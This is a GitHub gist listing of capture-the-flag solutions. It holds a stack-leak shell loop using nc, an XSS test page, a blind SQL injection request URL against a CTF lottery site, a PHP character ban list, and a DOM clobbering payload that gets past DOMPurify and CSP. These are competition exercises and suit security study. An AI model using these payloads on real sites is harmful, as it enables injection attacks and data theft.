Skip to content

Instantly share code, notes, and snippets.

Avatar

terjanq

View GitHub Profile
View blind_solution.py
#!/usr/bin/env python2
# encoding: utf-8
from pwn import *
from Crypto.Util.number import long_to_bytes
def chinese_remainder(n, a):
sum = 0
prod = reduce(lambda a, b: a*b, n)
@terjanq
terjanq / soluton_quotes.sh
Last active Apr 15, 2019
Solution for Potent Quotes #pctf2019
View soluton_quotes.sh
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it
#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done
@terjanq
terjanq / test_post.html
Created Apr 25, 2019
DOM Validator - angstrom CTF 2019
View test_post.html
<!DOCTYPE html SYSTEM "3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc">
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js"></script>
<script src="../scripts/DOMValidator.js"></script>
</head>
<body>
<h1>test_post</h1>
<p><script>alert('pwned')</script></p>
@terjanq
terjanq / DOMValidator.js
Created Apr 25, 2019
DOM Validator - angstrom CTF 2019
View DOMValidator.js
function checksum (element) {
var string = ''
string += (element.attributes ? element.attributes.length : 0) + '|'
for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {
string += element.attributes[i].name + ':' + element.attributes[i].value + '|'
}
string += (element.childNodes ? element.childNodes.length : 0) + '|'
for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {
string += checksum(element.childNodes[i]) + '|'
}
@terjanq
terjanq / request.txt
Created Jun 30, 2019
gLotto solution #gctf2019 Google CTF
View request.txt
https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@
View harekaze19_solutions.md

SQLite Voting

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
 // whitespace chars
@terjanq
terjanq / full_challenge.html
Created Sep 23, 2019
XSS Challenge DOM Clobbering
View full_challenge.html
<!doctype html><meta charset=utf-8>
<title>SecurityMB's Security Challenge</title>
<style>
* {
font-family: monospace;
}
textarea {
width:100%;
height:90px;
View injection_point.js
const sanitized = DOMPurify.sanitize(input.value);
const html = `
<meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
<h1>Homepage!</h1>
<p>Welcome to my homepage! Here are some info about me:</p>
${sanitized}
<script nonce=xyz src="./main.js"><\/script>
`;
@terjanq
terjanq / main.js
Created Sep 23, 2019
XSS Challenge DOM Clobbering
View main.js
window.CONFIG = window.CONFIG || {
version: "v20190816",
test: false,
appName: "XSS Challenge",
}
function loadModule(moduleName) {
const scriptSrc = new URL(document.currentScript.src);
let url = '';
@terjanq
terjanq / straight-forward-solution.html
Last active Sep 23, 2019
XSS Challenge DOM Clobbering
View straight-forward-solution.html
<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>